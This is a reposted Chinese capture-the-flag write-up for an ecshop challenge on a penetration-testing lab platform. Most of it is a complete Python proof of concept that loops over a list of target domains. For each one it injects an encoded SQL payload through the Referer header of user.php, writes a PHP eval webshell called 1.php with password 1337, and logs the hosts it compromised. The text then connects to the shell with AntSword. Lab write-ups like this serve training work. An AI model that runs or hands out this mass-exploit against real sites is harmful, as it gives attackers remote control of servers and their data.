安鸾渗透实战平台(CMS系列)—— ecshop

安鸾渗透实战平台(CMS系列)—— ecshop ,第1张

漏洞环境

安鸾渗透实战平台
python 3
中国蚁剑(webshell管理工具)

题目

情况分析 1、访问网页,最下面也有版本信息泄露

2、信息收集

3、找到一个公用POC,用python执行的
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import time
a="554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}"

c=list(open('url.txt'))

for url in c:
  try:
    exp="http://"+url.strip()+"/user.php?act=login"
    headers ={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0','Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Referer':a,'Accept-Encoding': 'gzip, deflate'}
    m=requests.get(url=exp,headers=headers)
    url2="http://"+url.strip()+"/1.php"
    time.sleep(2)
    n=requests.get(url=url2)
    if n.status_code==200:
      print("shell地址是"+url2)
      f=open("ok.txt","a")
      f.writelines(url2)
      f.close()
    else:
      print("不存在漏洞")
  except Exception:
      print("不存在漏洞")
4、使用poc进行攻击

通过分析源码得知,需要在当前文件夹下创建一个url.txt的文本文件,里面放域名信息即可

调用脚本

使用蚁剑链接(shell密码是1337)

flag在根目录下面

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/866751.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-12
下一篇 2022-05-12

发表评论

登录后才能评论

评论列表(0条)

保存